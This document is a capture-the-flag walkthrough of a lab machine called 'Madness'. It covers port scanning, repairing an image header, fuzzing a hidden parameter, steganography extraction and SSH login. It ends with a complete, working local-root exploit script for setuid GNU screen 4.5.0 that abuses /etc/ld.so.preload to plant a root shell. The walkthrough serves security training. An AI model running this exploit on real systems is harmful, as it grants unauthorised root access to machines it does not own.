# Madness

## Nmap

```
sudo nmap 10.10.123.18 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 24.11 seconds
```

The default page for http\://\<IP> resolves to the Apache2 Ubuntu page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FzYzwetvP6KVmjkTdHKVb%2Fimage.png?alt=media\&token=162b2f0a-1445-4da5-875a-47e9f1d8bf59)

Looking at the page source code we find something of interest.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F8xqSd3Nf6j90lAgeMZak%2Fimage.png?alt=media\&token=a09a9cc0-06d2-4087-9839-2a2fbf43b698)

We can then use `Curl` to download the JPG file.

```bash
curl http://10.10.123.185/thm.jpg --output thm2.jpg
```

From here we have no luck opening the file as a standard JPG file. I uploaded the file to an online hex editor to further inspect.

{% embed url="<https://hexed.it>" %}

The hex editor shows that the header information for the file is actually set to PNG rather than JPEG.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fj7PaBTu8deJjHVRLu76Z%2Fimage.png?alt=media\&token=6d9accdc-57d5-4167-9b85-2ca4938cb007)

Using the following information linked here: <https://www.file-recovery.com/jpg-signature-format.htm>.

We are able to replicate the correct header for the first line in order to set the correct header for the data type.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F85A5SGLG15JiFRisbZpG%2Fimage.png?alt=media\&token=f6acfa3b-31a3-40e1-a8bf-6c7ae3fd1b5b)

After doing so the image can be exported and viewed correctly.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVUCAHg81UPF9zj091ShW%2Fimage.png?alt=media\&token=3da0e408-c3a2-44f0-ac5e-67e968691ad2)

The image presents the directory `/th1s_1s_h1dd3n`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FC6NIzQLSxtjUbJiY5igW%2Fimage.png?alt=media\&token=87dd2582-da85-4512-b35c-6a0532529f79)

Viewing the page source reveals the commented line:

```html
<!-- It's between 0-99 but I don't think anyone will look here-->
```

After some poking about I found that the main index page is PHP. Along with this and no obvious method for inputting the secret mentioned above its probable that the `/th1s_1s_h1dd3n` directory will take a `PHP` parameter for input.

After some testing I found the following URL to be a valid parameter:

```
http://<IP>/th1s_1s_h1dd3n/?secret=1
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bd42f34d9012bc4bd1fb0b70f3e7c2e9863b7bfc%2Fimage%20\(2052\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\)%20\(1\).png?alt=media)

I then used `fuff` to automate this.

```bash
ffuf -u "http://<IP>/th1s_1s_h1dd3n/?secret=FUZZ" -c -w ~/Desktop/99.txt -fw 45      
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FLiheUThxVccLa0DKFfRe%2Fimage.png?alt=media\&token=39cf3dd2-60a3-461c-9014-6953634e5db5)

Where the number 73 appears to be the correct input.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FowUEfTtpoay8hdtjap4b%2Fmadness-jpg.png?alt=media\&token=9652117e-649f-4e37-b836-71084d4e1c20)

This password can be used with `steghide` to then extract secret information from the `thm.jpg` (with the correct JPEG header).

```bash
steghide --extract -sf thm.jpg
```

From the extracted data we find we are given an encoded username. Using Cyberchef: <https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,13)> and with the hint from the room ROT13 can be used to decode the real username value.

Unfortunately this part of the room had to be looked up. This is because the password information required to proceed is hidden in the image on the room page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FC6Be0h6Ayu5pmSJnkY9v%2Fimage.png?alt=media\&token=f73f6b1c-db06-4e42-a6d0-2e377cf81ee5)

```
steghide --extract -sf thm-image.jpg 
```

We do not need a password to extract at least...

We now have all the information required to proceed with a SSH login as the user joker.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FYLtVSoWsuo9PZXTAYBwG%2Fimage.png?alt=media\&token=ea7a56ba-fae2-43ec-bf24-5cd651a7f6d1)

Through the standard enumeration checks we find `SETUID` is set on a non standard binary screen-4.5.0.

```
find /bin -perm -4000
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FvIWCDyrRMtFLMVWl3EdH%2Fimage.png?alt=media\&token=20d14b87-a7f6-4a73-810d-d42438ecd940)

A simple Google search for this binary shows various exploits. Of which the most simple is shown below.

**Original vulnerability report:** <https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html>

**Github PoC:** <https://github.com/XiphosResearch/exploits/blob/master/screen2root/screenroot.sh>

```bash
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell
```

Create a bash file with `nano` and paste the code above in the file. Then execute with `bash`. This will give us a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FoYGwaevyJFFYrKtgSlGB%2Fimage.png?alt=media\&token=016bc6c5-9d87-4436-a22e-d6917fd77dc1)